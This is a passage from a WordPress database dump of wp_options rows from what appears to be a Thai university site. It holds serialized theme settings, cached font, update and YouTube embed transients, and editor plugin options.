(301, 'theme_mods_flash-blog', 'a:4:{i:0;b:0;s:18:"nav_menu_locations";a:1:{s:7:"mainnav";i:15;}s:18:"custom_css_post_id";i:-1;s:16:"sidebars_widgets";a:2:{s:4:"time";i:1558846907;s:4:"data";a:5:{s:19:"wp_inactive_widgets";a:0:{}s:9:"sidebar-1";a:7:{i:0;s:8:"search-2";i:1;s:10:"nav_menu-2";i:2;s:14:"recent-posts-2";i:3;s:17:"recent-comments-2";i:4;s:10:"archives-2";i:5;s:12:"categories-2";i:6;s:6:"meta-2";}s:12:"footer-col-1";a:0:{}s:12:"footer-col-2";a:0:{}s:12:"footer-col-3";a:0:{}}}}', 'yes'),
(349, 'theme_mods_buzz-ecommerce', 'a:4:{i:0;b:0;s:18:"nav_menu_locations";a:1:{s:6:"menu-1";i:15;}s:18:"custom_css_post_id";i:-1;s:16:"sidebars_widgets";a:2:{s:4:"time";i:1558846868;s:4:"data";a:2:{s:19:"wp_inactive_widgets";a:0:{}s:9:"sidebar-1";a:7:{i:0;s:8:"search-2";i:1;s:10:"nav_menu-2";i:2;s:14:"recent-posts-2";i:3;s:17:"recent-comments-2";i:4;s:10:"archives-2";i:5;s:12:"categories-2";i:6;s:6:"meta-2";}}}}', 'yes'),
(350, 'Buzz_Ecommerce_admin_notice_welcome', '1', 'yes'),
(354, 'theme_mods_labbook', 'a:3:{i:0;b:0;s:18:"nav_menu_locations";a:0:{}s:16:"sidebars_widgets";a:2:{s:4:"time";i:1558844825;s:4:"data";a:2:{s:19:"wp_inactive_widgets";a:0:{}s:9:"sidebar-1";a:7:{i:0;s:8:"search-2";i:1;s:10:"nav_menu-2";i:2;s:14:"recent-posts-2";i:3;s:17:"recent-comments-2";i:4;s:10:"archives-2";i:5;s:12:"categories-2";i:6;s:6:"meta-2";}}}}', 'yes'),
(356, 'theme_mods_Buzz Ecommerce', 'a:2:{i:0;b:0;s:16:"sidebars_widgets";a:2:{s:4:"time";i:1558844827;s:4:"data";a:2:{s:19:"wp_inactive_widgets";a:0:{}s:9:"sidebar-1";a:7:{i:0;s:8:"search-2";i:1;s:10:"nav_menu-2";i:2;s:14:"recent-posts-2";i:3;s:17:"recent-comments-2";i:4;s:10:"archives-2";i:5;s:12:"categories-2";i:6;s:6:"meta-2";}}}}', 'yes'),
(363, 'theme_mods_modern-storytelling', 'a:4:{i:0;b:0;s:18:"nav_menu_locations";a:0:{}s:18:"custom_css_post_id";i:-1;s:16:"sidebars_widgets";a:2:{s:4:"time";i:1558845120;s:4:"data";a:8:{s:19:"wp_inactive_widgets";a:0:{}s:9:"sidebar-1";a:7:{i:0;s:8:"search-2";i:1;s:10:"nav_menu-2";i:2;s:14:"recent-posts-2";i:3;s:17:"recent-comments-2";i:4;s:10:"archives-2";i:5;s:12:"categories-2";i:6;s:6:"meta-2";}s:14:"footerwidget-1";a:0:{}s:14:"footerwidget-2";a:0:{}s:14:"footerwidget-3";a:0:{}s:14:"headerwidget-1";a:0:{}s:14:"headerwidget-2";a:0:{}s:14:"headerwidget-3";a:0:{}}}}', 'yes'),
(367, 'theme_mods_salinger', 'a:4:{i:0;b:0;s:18:"nav_menu_locations";a:0:{}s:18:"custom_css_post_id";i:-1;s:16:"sidebars_widgets";a:2:{s:4:"time";i:1558845243;s:4:"data";a:8:{s:19:"wp_inactive_widgets";a:0:{}s:9:"sidebar-1";a:7:{i:0;s:8:"search-2";i:1;s:10:"nav_menu-2";i:2;s:14:"recent-posts-2";i:3;s:17:"recent-comments-2";i:4;s:10:"archives-2";i:5;s:12:"categories-2";i:6;s:6:"meta-2";}s:37:"salinger-sidebar-before-entry-content";a:0:{}s:36:"salinger-sidebar-after-entry-content";a:0:{}s:25:"salinger-sidebar-footer-1";a:0:{}s:25:"salinger-sidebar-footer-2";a:0:{}s:25:"salinger-sidebar-footer-3";a:0:{}s:25:"salinger-sidebar-footer-4";a:0:{}}}}', 'yes'),
(373, 'theme_mods_creative-agency', 'a:4:{i:0;b:0;s:18:"nav_menu_locations";a:0:{}s:18:"custom_css_post_id";i:-1;s:16:"sidebars_widgets";a:2:{s:4:"time";i:1558845400;s:4:"data";a:3:{s:19:"wp_inactive_widgets";a:0:{}s:9:"sidebar-1";a:7:{i:0;s:8:"search-2";i:1;s:10:"nav_menu-2";i:2;s:14:"recent-posts-2";i:3;s:17:"recent-comments-2";i:4;s:10:"archives-2";i:5;s:12:"categories-2";i:6;s:6:"meta-2";}s:12:"sidebar_page";a:0:{}}}}', 'yes'),
(374, 'widget_di_responsive_social_widget', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'),
(377, '_site_transient_timeout_kirki_gfonts_29fbdc60ea136820aed5e9e76c408af1', '1559450049', 'no'),
(378, '_site_transient_kirki_gfonts_29fbdc60ea136820aed5e9e76c408af1', '@font-face{font-display:swap;font-family:''Lora'';font-style:normal;font-weight:400;src:local(''Lora Regular''), local(''Lora-Regular''), url(http://172.17.40.11/wp511/wp-content/uploads/2019/05/0QIvMX1D_JOuAw4.woff) format(''woff'');}', 'no'),
(379, '_site_transient_timeout_kirki_gfonts_0e5d32ffc23a9c761aa7d0001f9bcd83', '1559450050', 'no'),
(380, '_site_transient_kirki_gfonts_0e5d32ffc23a9c761aa7d0001f9bcd83', '@font-face{font-display:swap;font-family:''Arvo'';font-style:normal;font-weight:400;src:local(''Arvo''), url(http://172.17.40.11/wp511/wp-content/uploads/2019/05/tDbD2oWUg0MKqScQ6w.woff) format(''woff'');}', 'no'),
(381, '_site_transient_timeout_kirki_gfonts_e12bfb19ff48e1fa4f3dac0d99cb3348', '1559450050', 'no'),
(382, '_site_transient_kirki_gfonts_e12bfb19ff48e1fa4f3dac0d99cb3348', '@font-face{font-display:swap;font-family:''Fauna One'';font-style:normal;font-weight:400;src:local(''Fauna One''), local(''FaunaOne-Regular''), url(http://172.17.40.11/wp511/wp-content/uploads/2019/05/wlpzgwTPBVpjpCuwkuEB0EZM.woff) format(''woff'');}', 'no'),
(383, '_site_transient_timeout_kirki_gfonts_406c87a40064f6c1c79609a8ab27ff40', '1559450051', 'no'),
(384, '_site_transient_kirki_gfonts_406c87a40064f6c1c79609a8ab27ff40', '@font-face{font-display:swap;font-family:''Rajdhani'';font-style:normal;font-weight:500;src:local(''Rajdhani Medium''), local(''Rajdhani-Medium''), url(http://172.17.40.11/wp511/wp-content/uploads/2019/05/LDI2apCSOBg7S-QT7pb0EMOv.woff) format(''woff'');}', 'no'),
(385, '_site_transient_timeout_kirki_gfonts_3ad25642740d87ba8270d05ebe128636', '1559450052', 'no'),
(386, '_site_transient_kirki_gfonts_3ad25642740d87ba8270d05ebe128636', '@font-face{font-display:swap;font-family:''Roboto'';font-style:normal;font-weight:400;src:local(''Roboto''), local(''Roboto-Regular''), url(http://172.17.40.11/wp511/wp-content/uploads/2019/05/KFOmCnqEu92Fr1Me5g.woff) format(''woff'');}', 'no'),
(390, 'theme_mods_ecommerce-lite', 'a:4:{i:0;b:0;s:18:"nav_menu_locations";a:0:{}s:18:"custom_css_post_id";i:-1;s:16:"sidebars_widgets";a:2:{s:4:"time";i:1558845489;s:4:"data";a:8:{s:19:"wp_inactive_widgets";a:0:{}s:9:"sidebar-1";a:7:{i:0;s:8:"search-2";i:1;s:10:"nav_menu-2";i:2;s:14:"recent-posts-2";i:3;s:17:"recent-comments-2";i:4;s:10:"archives-2";i:5;s:12:"categories-2";i:6;s:6:"meta-2";}s:11:"woocommerce";a:0:{}s:8:"footer-1";a:0:{}s:8:"footer-2";a:0:{}s:8:"footer-3";a:0:{}s:8:"footer-4";a:0:{}s:8:"footer-5";a:0:{}}}}', 'yes'),
(392, 'ecommerce_lite_admin_notice_welcome', '1', 'yes'),
(397, 'theme_mods_fashion-diva', 'a:4:{i:0;b:0;s:18:"nav_menu_locations";a:0:{}s:18:"custom_css_post_id";i:-1;s:16:"sidebars_widgets";a:2:{s:4:"time";i:1558845581;s:4:"data";a:6:{s:19:"wp_inactive_widgets";a:0:{}s:7:"sidebar";a:7:{i:0;s:8:"search-2";i:1;s:10:"nav_menu-2";i:2;s:14:"recent-posts-2";i:3;s:17:"recent-comments-2";i:4;s:10:"archives-2";i:5;s:12:"categories-2";i:6;s:6:"meta-2";}s:10:"footer-one";a:0:{}s:10:"footer-two";a:0:{}s:12:"footer-three";a:0:{}s:11:"footer-four";a:0:{}}}}', 'yes'),
(403, 'theme_mods_storement', 'a:4:{i:0;b:0;s:18:"nav_menu_locations";a:0:{}s:18:"custom_css_post_id";i:-1;s:16:"sidebars_widgets";a:2:{s:4:"time";i:1558845658;s:4:"data";a:10:{s:19:"wp_inactive_widgets";a:0:{}s:24:"express-off-canvas-panel";a:0:{}s:21:"advertisement-section";a:0:{}s:25:"frontpage-content-widgets";a:0:{}s:20:"shop-sidebar-widgets";a:7:{i:0;s:8:"search-2";i:1;s:10:"nav_menu-2";i:2;s:14:"recent-posts-2";i:3;s:17:"recent-comments-2";i:4;s:10:"archives-2";i:5;s:12:"categories-2";i:6;s:6:"meta-2";}s:9:"sidebar-1";a:0:{}s:28:"footer-first-widgets-section";a:0:{}s:29:"footer-second-widgets-section";a:0:{}s:28:"footer-third-widgets-section";a:0:{}s:20:"above-footer-section";a:0:{}}}}', 'yes'),
(404, 'widget_product_posts_latest', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'),
(405, 'widget_shopical_author_info', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'),
(406, 'widget_shopical_store_call_to_action', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'),
(407, 'widget_shopical_store_features', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'),
(408, 'widget_shopical_store_offers', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'),
(409, 'widget_shopical_social_contacts', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'),
(414, 'theme_mods_vw-kids', 'a:4:{i:0;b:0;s:18:"nav_menu_locations";a:0:{}s:18:"custom_css_post_id";i:-1;s:16:"sidebars_widgets";a:2:{s:4:"time";i:1558845729;s:4:"data";a:8:{s:19:"wp_inactive_widgets";a:0:{}s:9:"sidebar-1";a:7:{i:0;s:8:"search-2";i:1;s:10:"nav_menu-2";i:2;s:14:"recent-posts-2";i:3;s:17:"recent-comments-2";i:4;s:10:"archives-2";i:5;s:12:"categories-2";i:6;s:6:"meta-2";}s:9:"sidebar-2";a:0:{}s:9:"sidebar-3";a:0:{}s:8:"footer-1";a:0:{}s:8:"footer-2";a:0:{}s:8:"footer-3";a:0:{}s:8:"footer-4";a:0:{}}}}', 'yes'),
(415, 'widget_vw_kids_social_widget', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'),
(420, 'theme_mods_advance-ecommerce-store', 'a:4:{i:0;b:0;s:18:"nav_menu_locations";a:0:{}s:18:"custom_css_post_id";i:-1;s:16:"sidebars_widgets";a:2:{s:4:"time";i:1558845926;s:4:"data";a:10:{s:19:"wp_inactive_widgets";a:0:{}s:9:"sidebar-1";a:7:{i:0;s:8:"search-2";i:1;s:10:"nav_menu-2";i:2;s:14:"recent-posts-2";i:3;s:17:"recent-comments-2";i:4;s:10:"archives-2";i:5;s:12:"categories-2";i:6;s:6:"meta-2";}s:9:"sidebar-2";a:0:{}s:9:"sidebar-3";a:0:{}s:8:"footer-1";a:0:{}s:8:"footer-2";a:0:{}s:8:"footer-3";a:0:{}s:8:"footer-4";a:0:{}s:16:"homepage-sidebar";a:0:{}s:6:"social";a:0:{}}}}', 'yes'),
(421, 'widget_advance_ecommerce_store_social_widget', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'),
(429, 'theme_mods_e-commerce-shop', 'a:4:{i:0;b:0;s:18:"nav_menu_locations";a:0:{}s:18:"custom_css_post_id";i:-1;s:16:"sidebars_widgets";a:2:{s:4:"time";i:1558845993;s:4:"data";a:9:{s:19:"wp_inactive_widgets";a:0:{}s:9:"sidebar-1";a:7:{i:0;s:8:"search-2";i:1;s:10:"nav_menu-2";i:2;s:14:"recent-posts-2";i:3;s:17:"recent-comments-2";i:4;s:10:"archives-2";i:5;s:12:"categories-2";i:6;s:6:"meta-2";}s:9:"sidebar-2";a:0:{}s:9:"sidebar-3";a:0:{}s:8:"footer-1";a:0:{}s:8:"footer-2";a:0:{}s:8:"footer-3";a:0:{}s:8:"footer-4";a:0:{}s:8:"homepage";a:0:{}}}}', 'yes'),
(433, 'theme_mods_vw-ecommerce-shop', 'a:4:{i:0;b:0;s:18:"nav_menu_locations";a:0:{}s:18:"custom_css_post_id";i:-1;s:16:"sidebars_widgets";a:2:{s:4:"time";i:1558846190;s:4:"data";a:9:{s:19:"wp_inactive_widgets";a:0:{}s:9:"sidebar-1";a:7:{i:0;s:8:"search-2";i:1;s:10:"nav_menu-2";i:2;s:14:"recent-posts-2";i:3;s:17:"recent-comments-2";i:4;s:10:"archives-2";i:5;s:12:"categories-2";i:6;s:6:"meta-2";}s:9:"sidebar-2";a:0:{}s:9:"sidebar-3";a:0:{}s:8:"footer-1";a:0:{}s:8:"footer-2";a:0:{}s:8:"footer-3";a:0:{}s:8:"footer-4";a:0:{}s:11:"social-icon";a:0:{}}}}', 'yes'),
(434, 'widget_vw_ecommerce_shop_social_widget', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'),
(439, 'theme_mods_refresh', 'a:4:{i:0;b:0;s:18:"nav_menu_locations";a:0:{}s:18:"custom_css_post_id";i:-1;s:16:"sidebars_widgets";a:2:{s:4:"time";i:1558846275;s:4:"data";a:5:{s:19:"wp_inactive_widgets";a:0:{}s:10:"refsidebar";a:7:{i:0;s:8:"search-2";i:1;s:10:"nav_menu-2";i:2;s:14:"recent-posts-2";i:3;s:17:"recent-comments-2";i:4;s:10:"archives-2";i:5;s:12:"categories-2";i:6;s:6:"meta-2";}s:10:"refbottom1";a:0:{}s:10:"refbottom2";a:0:{}s:10:"refbottom3";a:0:{}}}}', 'yes'),
(443, 'theme_mods_shoppingcart', 'a:5:{i:0;b:0;s:26:"shoppingcart_theme_options";a:53:{s:23:"shoppingcart_responsive";s:2:"on";s:26:"shoppingcart_design_layout";s:17:"full-width-layout";s:26:"shoppingcart_post_category";i:0;s:24:"shoppingcart_post_author";i:0;s:22:"shoppingcart_post_date";i:0;s:26:"shoppingcart_post_comments";i:0;s:35:"shoppingcart_sidebar_layout_options";s:5:"right";s:33:"shoppingcart_search_custom_header";i:0;s:27:"shoppingcart_header_display";s:11:"header_text";s:19:"shoppingcart_scroll";i:0;s:21:"shoppingcart_tag_text";s:16:"Continue Reading";s:27:"shoppingcart_excerpt_length";s:2:"50";s:22:"shoppingcart_reset_all";i:0;s:23:"shoppingcart_stick_menu";i:0;s:28:"shoppingcart_blog_post_image";s:2:"on";s:24:"shoppingcart_search_text";s:15:"Search &hellip;";s:32:"shoppingcart_blog_content_layout";s:19:"fullcontent_display";s:30:"shoppingcart_entry_meta_single";s:4:"show";s:28:"shoppingcart_entry_meta_blog";s:9:"show-meta";s:34:"shoppingcart_footer_column_section";s:1:"4";s:30:"shoppingcart_disable_main_menu";i:0;s:28:"shoppingcart_disable_top_bar";i:0;s:42:"shoppingcart_img-product-promotion-image-1";s:0:"";s:42:"shoppingcart_img-product-promotion-image-2";s:0:"";s:42:"shoppingcart_img-product-promotion-image-3";s:0:"";s:36:"shoppingcart_product_promotion_url_1";s:0:"";s:36:"shoppingcart_product_promotion_url_2";s:0:"";s:36:"shoppingcart_product_promotion_url_3";s:0:"";s:37:"shoppingcart_product_background_color";s:3:"off";s:31:"shoppingcart_big_promo_category";s:3:"off";s:35:"shoppingcart_display_featured_brand";s:12:"below-widget";s:34:"shoppingcart_display_advertisement";s:12:"above-slider";s:29:"shoppingcart_default_category";s:13:"post_category";s:24:"shoppingcart_slider_type";s:14:"default_slider";s:26:"shoppingcart_enable_slider";s:7:"disable";s:28:"shoppingcart_category_slider";a:0:{}s:36:"shoppingcart_default_category_slider";s:0:"";s:26:"shoppingcart_slider_number";s:1:"3";s:29:"shoppingcart_animation_effect";s:4:"fade";s:27:"shoppingcart_slideshowSpeed";s:1:"5";s:27:"shoppingcart_animationSpeed";s:1:"7";s:47:"shoppingcart_display_page_single_featured_image";i:0;s:34:"shoppingcart_disable_product_brand";i:1;s:33:"shoppingcart_total_brand_features";s:1:"8";s:27:"shoppingcart_features_title";s:0:"";s:33:"shoppingcart_features_description";s:0:"";s:39:"shoppingcart_disable_product_categories";i:1;s:27:"shoppingcart_total_features";s:1:"5";s:38:"shoppingcart_categories_features_title";s:0:"";s:44:"shoppingcart_categories_features_description";s:0:"";s:29:"shoppingcart_top_social_icons";i:0;s:32:"shoppingcart_buttom_social_icons";i:0;s:29:"shoppingcart_adv_ban_position";s:12:"above-slider";}s:18:"nav_menu_locations";a:0:{}s:18:"custom_css_post_id";i:-1;s:16:"sidebars_widgets";a:2:{s:4:"time";i:1558846615;s:4:"data";a:16:{s:19:"wp_inactive_widgets";a:0:{}s:25:"shoppingcart_main_sidebar";a:7:{i:0;s:8:"search-2";i:1;s:10:"nav_menu-2";i:2;s:14:"recent-posts-2";i:3;s:17:"recent-comments-2";i:4;s:10:"archives-2";i:5;s:12:"categories-2";i:6;s:6:"meta-2";}s:24:"shoppingcart_header_info";a:0:{}s:22:"shoppingcart_ad_banner";a:0:{}s:21:"shoppingcart_template";a:0:{}s:33:"shoppingcart_contact_page_sidebar";a:0:{}s:34:"shoppingcart_form_for_contact_page";a:0:{}s:32:"shoppingcart_woocommerce_sidebar";a:0:{}s:34:"shoppingcart_template_footer_col_1";a:0:{}s:34:"shoppingcart_template_footer_col_2";a:0:{}s:34:"shoppingcart_template_footer_col_3";a:0:{}s:34:"shoppingcart_template_footer_col_4";a:0:{}s:21:"shoppingcart_footer_1";a:0:{}s:21:"shoppingcart_footer_2";a:0:{}s:21:"shoppingcart_footer_3";a:0:{}s:21:"shoppingcart_footer_4";a:0:{}}}}', 'yes'),
(444, 'widget_shoppingcart_popular_widgets', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'),
(453, 'theme_mods_education-xpert', 'a:4:{i:0;b:0;s:18:"nav_menu_locations";a:0:{}s:18:"custom_css_post_id";i:-1;s:16:"sidebars_widgets";a:2:{s:4:"time";i:1558846830;s:4:"data";a:4:{s:19:"wp_inactive_widgets";a:0:{}s:9:"sidebar-1";a:7:{i:0;s:8:"search-2";i:1;s:10:"nav_menu-2";i:2;s:14:"recent-posts-2";i:3;s:17:"recent-comments-2";i:4;s:10:"archives-2";i:5;s:12:"categories-2";i:6;s:6:"meta-2";}s:9:"sidebar-2";a:0:{}s:8:"footer-1";a:0:{}}}}', 'yes'),
(455, 'theme_mods_blossom-fashion', 'a:4:{i:0;b:0;s:18:"nav_menu_locations";a:0:{}s:18:"custom_css_post_id";i:-1;s:16:"sidebars_widgets";a:2:{s:4:"time";i:1558846854;s:4:"data";a:6:{s:19:"wp_inactive_widgets";a:0:{}s:7:"sidebar";a:7:{i:0;s:8:"search-2";i:1;s:10:"nav_menu-2";i:2;s:14:"recent-posts-2";i:3;s:17:"recent-comments-2";i:4;s:10:"archives-2";i:5;s:12:"categories-2";i:6;s:6:"meta-2";}s:10:"footer-one";a:0:{}s:10:"footer-two";a:0:{}s:12:"footer-three";a:0:{}s:11:"footer-four";a:0:{}}}}', 'yes'),
(460, 'theme_mods_educenter', 'a:4:{i:0;b:0;s:18:"nav_menu_locations";a:1:{s:6:"menu-1";i:15;}s:18:"custom_css_post_id";i:-1;s:16:"sidebars_widgets";a:2:{s:4:"time";i:1558846887;s:4:"data";a:4:{s:19:"wp_inactive_widgets";a:0:{}s:9:"sidebar-1";a:7:{i:0;s:8:"search-2";i:1;s:10:"nav_menu-2";i:2;s:14:"recent-posts-2";i:3;s:17:"recent-comments-2";i:4;s:10:"archives-2";i:5;s:12:"categories-2";i:6;s:6:"meta-2";}s:9:"sidebar-2";a:0:{}s:8:"footer-1";a:0:{}}}}', 'yes'),
(470, '_transient_twentysixteen_categories', '2', 'yes'),
(548, '_transient_twentyfourteen_category_count', '6', 'yes'),
(556, 'theme_mods_parvati', 'a:4:{i:0;b:0;s:18:"nav_menu_locations";a:1:{s:7:"primary";i:16;}s:18:"custom_css_post_id";i:-1;s:16:"sidebars_widgets";a:2:{s:4:"time";i:1558852653;s:4:"data";a:11:{s:19:"wp_inactive_widgets";a:0:{}s:9:"sidebar-1";a:4:{i:0;s:8:"search-2";i:1;s:10:"nav_menu-2";i:2;s:14:"recent-posts-2";i:3;s:6:"meta-2";}s:9:"sidebar-2";a:0:{}s:6:"header";a:0:{}s:8:"footer-1";a:0:{}s:8:"footer-2";a:0:{}s:8:"footer-3";a:0:{}s:8:"footer-4";a:0:{}s:8:"footer-5";a:0:{}s:10:"footer-bar";a:0:{}s:7:"top-bar";a:0:{}}}}', 'yes'),
(565, 'theme_mods_twenty8teen', 'a:4:{i:0;b:0;s:18:"nav_menu_locations";a:1:{s:8:"mainmenu";i:16;}s:18:"custom_css_post_id";i:-1;s:16:"sidebars_widgets";a:2:{s:4:"time";i:1558852903;s:4:"data";a:5:{s:19:"wp_inactive_widgets";a:9:{i:0;s:27:"twenty8teen-template-part-2";i:1;s:27:"twenty8teen-template-part-3";i:2;s:27:"twenty8teen-template-part-4";i:3;s:27:"twenty8teen-template-part-5";i:4;s:23:"twenty8teen-loop-part-2";i:5;s:8:"search-2";i:6;s:10:"nav_menu-2";i:7;s:14:"recent-posts-2";i:8;s:6:"meta-2";}s:18:"header-widget-area";a:0:{}s:19:"content-widget-area";a:0:{}s:16:"side-widget-area";a:0:{}s:18:"footer-widget-area";a:0:{}}}}', 'yes'),
(571, 'theme_mods_twentyten', 'a:4:{i:0;b:0;s:18:"nav_menu_locations";a:1:{s:7:"primary";i:16;}s:18:"custom_css_post_id";i:-1;s:16:"sidebars_widgets";a:2:{s:4:"time";i:1558852963;s:4:"data";a:7:{s:19:"wp_inactive_widgets";a:4:{i:0;s:8:"search-2";i:1;s:10:"nav_menu-2";i:2;s:14:"recent-posts-2";i:3;s:6:"meta-2";}s:19:"primary-widget-area";a:0:{}s:21:"secondary-widget-area";a:0:{}s:24:"first-footer-widget-area";a:0:{}s:25:"second-footer-widget-area";a:0:{}s:24:"third-footer-widget-area";a:0:{}s:25:"fourth-footer-widget-area";a:0:{}}}}', 'yes'),
(575, 'theme_mods_chandigarh', 'a:4:{i:0;b:0;s:18:"nav_menu_locations";a:1:{s:3:"top";i:16;}s:18:"custom_css_post_id";i:-1;s:16:"sidebars_widgets";a:2:{s:4:"time";i:1558853048;s:4:"data";a:4:{s:19:"wp_inactive_widgets";a:4:{i:0;s:8:"search-2";i:1;s:10:"nav_menu-2";i:2;s:14:"recent-posts-2";i:3;s:6:"meta-2";}s:9:"sidebar-1";a:0:{}s:9:"sidebar-2";a:0:{}s:9:"sidebar-3";a:0:{}}}}', 'yes'),
(576, '_transient_twentyseventeen_categories', '2', 'yes'),
(578, '_site_transient_update_core', 'O:8:"stdClass":4:{s:7:"updates";a:4:{i:0;O:8:"stdClass":10:{s:8:"response";s:7:"upgrade";s:8:"download";s:62:"https://downloads.wordpress.org/release/th/wordpress-5.2.1.zip";s:6:"locale";s:2:"th";s:8:"packages";O:8:"stdClass":5:{s:4:"full";s:62:"https://downloads.wordpress.org/release/th/wordpress-5.2.1.zip";s:10:"no_content";b:0;s:11:"new_bundled";b:0;s:7:"partial";b:0;s:8:"rollback";b:0;}s:7:"current";s:5:"5.2.1";s:7:"version";s:5:"5.2.1";s:11:"php_version";s:6:"5.6.20";s:13:"mysql_version";s:3:"5.0";s:11:"new_bundled";s:3:"5.0";s:15:"partial_version";s:0:"";}i:1;O:8:"stdClass":10:{s:8:"response";s:7:"upgrade";s:8:"download";s:59:"https://downloads.wordpress.org/release/wordpress-5.2.1.zip";s:6:"locale";s:5:"en_US";s:8:"packages";O:8:"stdClass":5:{s:4:"full";s:59:"https://downloads.wordpress.org/release/wordpress-5.2.1.zip";s:10:"no_content";s:70:"https://downloads.wordpress.org/release/wordpress-5.2.1-no-content.zip";s:11:"new_bundled";s:71:"https://downloads.wordpress.org/release/wordpress-5.2.1-new-bundled.zip";s:7:"partial";b:0;s:8:"rollback";b:0;}s:7:"current";s:5:"5.2.1";s:7:"version";s:5:"5.2.1";s:11:"php_version";s:6:"5.6.20";s:13:"mysql_version";s:3:"5.0";s:11:"new_bundled";s:3:"5.0";s:15:"partial_version";s:0:"";}i:2;O:8:"stdClass":11:{s:8:"response";s:10:"autoupdate";s:8:"download";s:62:"https://downloads.wordpress.org/release/th/wordpress-5.2.1.zip";s:6:"locale";s:2:"th";s:8:"packages";O:8:"stdClass":5:{s:4:"full";s:62:"https://downloads.wordpress.org/release/th/wordpress-5.2.1.zip";s:10:"no_content";b:0;s:11:"new_bundled";b:0;s:7:"partial";b:0;s:8:"rollback";b:0;}s:7:"current";s:5:"5.2.1";s:7:"version";s:5:"5.2.1";s:11:"php_version";s:6:"5.6.20";s:13:"mysql_version";s:3:"5.0";s:11:"new_bundled";s:3:"5.0";s:15:"partial_version";s:0:"";s:9:"new_files";s:1:"1";}i:3;O:8:"stdClass":11:{s:8:"response";s:10:"autoupdate";s:8:"download";s:60:"https://downloads.wordpress.org/release/th/wordpress-5.2.zip";s:6:"locale";s:2:"th";s:8:"packages";O:8:"stdClass":5:{s:4:"full";s:60:"https://downloads.wordpress.org/release/th/wordpress-5.2.zip";s:10:"no_content";b:0;s:11:"new_bundled";b:0;s:7:"partial";b:0;s:8:"rollback";b:0;}s:7:"current";s:3:"5.2";s:7:"version";s:3:"5.2";s:11:"php_version";s:6:"5.6.20";s:13:"mysql_version";s:3:"5.0";s:11:"new_bundled";s:3:"5.0";s:15:"partial_version";s:0:"";s:9:"new_files";s:1:"1";}}s:12:"last_checked";i:1558921504;s:15:"version_checked";s:5:"5.1.1";s:12:"translations";a:0:{}}', 'no'),
(583, 'theme_mods_just-pink', 'a:4:{i:0;b:0;s:18:"nav_menu_locations";a:1:{s:7:"primary";i:16;}s:18:"custom_css_post_id";i:-1;s:16:"sidebars_widgets";a:2:{s:4:"time";i:1558853186;s:4:"data";a:4:{s:19:"wp_inactive_widgets";a:4:{i:0;s:8:"search-2";i:1;s:10:"nav_menu-2";i:2;s:14:"recent-posts-2";i:3;s:6:"meta-2";}s:9:"sidebar-1";a:1:{i:0;s:10:"nav_menu-3";}s:9:"sidebar-2";a:0:{}s:9:"sidebar-3";a:0:{}}}}', 'yes'),
(589, 'theme_mods_rcg-forest', 'a:3:{i:0;b:0;s:18:"nav_menu_locations";a:1:{s:7:"primary";i:16;}s:18:"custom_css_post_id";i:-1;}', 'yes'),
(590, '_transient_timeout_oembed_b89e637836ce7f527ade929143ecc942', '1558942498', 'no'),
(591, '_transient_oembed_b89e637836ce7f527ade929143ecc942', 'O:8:"stdClass":13:{s:11:"author_name";s:172:"สำนักวิทยบริการและเทคโนโลยีสารสนเทศ มหาวิทยาลัยราชภัฏสงขลา";s:6:"height";i:338;s:16:"thumbnail_height";i:360;s:4:"html";s:217:"<iframe width="600" height="338" src="https://www.youtube.com/embed/0uxQkIus27A?feature=oembed" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>";s:5:"title";s:121:"สำนักวิทยบริการฯ มหาวิทยาลัยราชภัฏสงขลา (V.2)";s:12:"provider_url";s:24:"https://www.youtube.com/";s:4:"type";s:5:"video";s:15:"thumbnail_width";i:480;s:13:"provider_name";s:7:"YouTube";s:10:"author_url";s:56:"https://www.youtube.com/channel/UCyihawKW9-I6HdnBGBhHasA";s:13:"thumbnail_url";s:48:"https://i.ytimg.com/vi/0uxQkIus27A/hqdefault.jpg";s:5:"width";i:600;s:7:"version";s:3:"1.0";}', 'no'),
(592, '_transient_timeout_oembed_79d4cbe4ff4474c02025c0a7f71bd736', '1558942501', 'no'),
(593, '_transient_oembed_79d4cbe4ff4474c02025c0a7f71bd736', 'O:8:"stdClass":13:{s:5:"title";s:162:"วีดีทัศน์แนะนำมหาวิทยาลัยราชภัฏสงขลา 2561 เวอร์ชั่นภาษาไทย";s:7:"version";s:3:"1.0";s:5:"width";i:600;s:15:"thumbnail_width";i:480;s:4:"type";s:5:"video";s:11:"author_name";s:12:"SKRU CHANNEL";s:13:"thumbnail_url";s:48:"https://i.ytimg.com/vi/y22195UuDTg/hqdefault.jpg";s:12:"provider_url";s:24:"https://www.youtube.com/";s:13:"provider_name";s:7:"YouTube";s:10:"author_url";s:56:"https://www.youtube.com/channel/UCo7NAuTN-b9NPDAvqjN0H7g";s:16:"thumbnail_height";i:360;s:4:"html";s:217:"<iframe width="600" height="338" src="https://www.youtube.com/embed/y22195UuDTg?feature=oembed" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>";s:6:"height";i:338;}', 'no'),
(603, 'classic-editor-replace', 'classic', 'yes'),
(604, 'classic-editor-allow-users', 'disallow', 'yes'),
(759, '_site_transient_timeout_browser_480ab0ea437e023d38e280fd3bf88e97', '1559522791', 'no'),
(760, '_site_transient_browser_480ab0ea437e023d38e280fd3bf88e97', 'a:10:{s:4:"name";s:6:"Chrome";s:7:"version";s:13:"74.0.3729.169";s:8:"platform";s:7:"Windows";s:10:"update_url";s:29:"https://www.google.com/chrome";s:7:"img_src";s:43:"http://s.w.org/images/browsers/chrome.png?1";s:11:"img_src_ssl";s:44:"https://s.w.org/images/browsers/chrome.png?1";s:15:"current_version";s:2:"18";s:7:"upgrade";b:0;s:8:"insecure";b:0;s:6:"mobile";b:0;}', 'no'),
(761, '_site_transient_timeout_community-events-c548491ea93620339ffcc926d5a62016', '1558961194', 'no'),
